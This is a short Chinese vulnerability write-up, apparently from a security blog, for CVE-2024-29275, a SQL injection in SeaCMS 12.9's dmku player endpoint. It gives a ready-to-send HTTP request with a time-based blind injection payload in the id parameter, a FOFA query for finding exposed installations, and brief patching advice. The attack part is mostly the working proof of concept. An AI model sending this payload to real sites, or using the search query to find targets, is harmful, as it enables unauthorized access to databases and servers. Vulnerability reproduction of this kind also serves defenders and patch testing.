海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)

0x01 产品简介

海洋CMS是一套专为不同需求的站长而设计的内容管理系统,灵活、方便、人性化设计、简单易用是最大的特色,可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发,完全开源免费 、无任何加密代码。

0x02 漏洞概述

海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。

0x03 影响范围

SeaCMS 12.9

0x04 复现环境

FOFA:app="海洋CMS"

0x05 漏洞复现

PoC

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

延时5秒

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本 

最近更新

  1. TCP协议是安全的吗?

    2024-06-13 10:00:02       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-13 10:00:02       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-13 10:00:02       18 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-13 10:00:02       20 阅读

热门阅读

  1. Linux常用命令大全

    2024-06-13 10:00:02       7 阅读
  2. React常见面试题(2024最新版)

    2024-06-13 10:00:02       9 阅读
  3. 算法笔记 图论和优先级队列的笔记

    2024-06-13 10:00:02       5 阅读
  4. linux开发常用命令

    2024-06-13 10:00:02       6 阅读
  5. 代码整洁之道学习笔记

    2024-06-13 10:00:02       5 阅读
  6. 使用foreach和stream遍历并修改List列表

    2024-06-13 10:00:02       9 阅读
  7. Elasticsearch介绍,要点和难点以及优缺点

    2024-06-13 10:00:02       7 阅读
  8. 智能数据抓取:自动化时代的资讯收割机

    2024-06-13 10:00:02       7 阅读
  9. 用python把docx批量转为pdf

    2024-06-13 10:00:02       9 阅读
  10. flutter 设置缓存的方法

    2024-06-13 10:00:02       6 阅读